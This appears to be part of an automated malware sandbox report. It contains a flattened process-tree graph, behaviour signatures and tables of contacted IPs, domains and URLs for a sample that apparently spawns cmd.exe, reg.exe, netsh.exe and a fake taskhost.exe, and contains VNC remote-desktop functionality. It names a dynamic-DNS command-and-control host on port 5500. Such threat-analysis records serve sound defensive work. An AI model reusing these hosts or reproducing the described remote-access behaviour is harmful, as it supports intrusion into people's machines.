signatures12 101 Uses cmd line tools excessively to alter registry or file data 33->101 40 cmd.exe 33->40         started        42 viewer.exe 33->42         started        44 cmd.exe 33->44         started        50 10 other processes 33->50 47 AcroCEF.exe 38->47         started        process13 dnsIp14 52 taskhost.exe 40->52         started        56 mode.com 40->56         started        58 netsh.exe 40->58         started        66 3 other processes 40->66 60 cmd.exe 42->60         started        121 Uses cmd line tools excessively to alter registry or file data 44->121 62 reg.exe 44->62         started        97 52.202.204.11, 443, 49738, 49740 AMAZON-AESUS United States 47->97 99 23.54.200.159, 443, 49747 AKAMAI-ASUS United States 47->99 64 cmd.exe 50->64         started        signatures15 process16 dnsIp17 91 vnvariant2024.ddnsfree.com 140.228.29.110, 49749, 5500 OARNET-ASUS United States 52->91 93 127.0.0.1 unknown unknown 52->93 115 Contains functionalty to change the wallpaper 52->115 117 Contains VNC / remote desktop functionality (version string found) 52->117 68 cmd.exe 60->68         started        71 conhost.exe 60->71         started        73 cmd.exe 60->73         started        75 conhost.exe 64->75         started        signatures18 process19 signatures20 113 Uses cmd line tools excessively to alter registry or file data 68->113 77 reg.exe 68->77         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.202.204.11
 unknown United States
14618 AMAZON-AESUS false
93.184.216.34
 www.example.com European Union
15133 EDGECASTUS false
23.54.200.159
 unknown United States
16625 AKAMAI-ASUS false
140.228.29.110
 vnvariant2024.ddnsfree.com United States
600 OARNET-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.example.com 93.184.216.34 true
vnvariant2024.ddnsfree.com 140.228.29.110 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.example.com/download/updates.txt false
    		high